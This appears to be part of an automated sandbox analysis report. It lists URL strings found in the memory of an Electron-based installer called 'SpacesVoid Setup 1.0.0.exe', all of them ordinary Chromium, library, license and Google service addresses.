Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/709351
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/797243
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/809422
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/830046
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/883276
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/927470
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crbug.com/941620allowTranslateUniformBlockToStructuredBufferThere
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://devel.freebsoft.org/speechd
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://developer.android.com/tools/extras/support-library.html
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2517672801.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://eksempel.dk
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://freedesktop.org
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://git.linuxtv.org/v4l-utils.git
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://google.github.io/snappy/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ns.apple.com/HDRGainMap/1.0/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ns.apple.com/pixeldatainfo/1.0/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ns.apple.com/pixeldatainfo/1.0/http://ns.apple.com/HDRGainMap/1.0/:
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ns.google.com/photos/1.0/container/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ns.google.com/photos/1.0/container/item/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000002.2656700393.000000000040A000.00000004.00000001.01000000.00000003.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000000.2164366978.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://opensource.perlig.de/rjsmin/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://source.android.com/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://source.android.com/compatibility)
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://src.chromium.org/viewvc/chrome/trunk/deps/third_party/xz/COPYING
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://tukaani.org/xz/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://userguide.icu-project.org/strings/properties
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://valgrind.org
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://webkit.org/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://website-archive.mozilla.org/www.mozilla.org/mpl/MPL/NPL/1.1/):
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2395756562.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.chromium.org
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.freedesktop.org/wiki/Software/xdg-user-dirs
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.gutenberg.org/ebooks/53).
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.linux-usb.org/usb-ids.html
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.midnight-commander.org/browser/lib/tty/key.c
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.org/NPL/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2264914211.0000000005830000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.opensource.org/licenses/bsd-license.php
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ploscompbiol.org/static/license
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.strongtalk.org/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com/tools/smslib.html
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.suitable.com/tools/smslib.html>
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.webrtc.org
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://zlib.net/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://android.googlesource.com/platform/external/puffin
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://android.googlesource.com/platform/external/setupdesign/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4674
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4849
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5140
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5536
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246enableCaptureLimitsSet
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7405
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/8308
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/8315
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/8319
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gcp.gvt2.com/domainreliability/upload
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons.gvt2.com/domainreliability/upload
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons2.gvt2.com/domainreliability/upload
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons3.gvt2.com/domainreliability/upload
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons4.gvt2.com/domainreliability/upload
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000075DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://beacons5.gvt2.com/domainreliability/upload
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bit.ly/window-placement-rename.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.htmlMixed
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=745678
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2511492991.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=am&category=theme81https://myactivity.google.com/myactivity/?u
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=cs&category=theme81https://myactivity.google.com/myactivity/?u
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherEnabled
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalGreylistUrl
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherExternalSitelistUrl
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlGreylist
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUrlList
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromeenterprise.google/policies/#BrowserSwitcherUseIeSitelist
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromestatus.com/feature/5105856067141632.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2523123903.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2511492991.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2517672801.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2515779186.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2521839611.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2531854292.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2534558562.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2512248087.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2530484846.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2512863636.0000000004E33000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2526381818.0000000004E33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chromestatus.com/features#browsers.chrome.status%3A%22Deprecated%22
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/angle/angle/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.0000000007668000.00000004.00001000.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2444500266.00000000051D6000.00000004.00000020.00020000.00000000.sdmp, SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2265168549.0000000005D30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399050429.0000000006F70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1038223.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1042393
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1046462
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1060012
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1091824
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1137851
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1300575
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/1356053
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024selectViewInGeometryShaderThe
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/619103.
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2399513055.00000000074D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/619103.Subsequence
Source: SpacesVoid Setup 1.0.0.exe, 00000000.00000003.2280593454.0000000006B70000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547
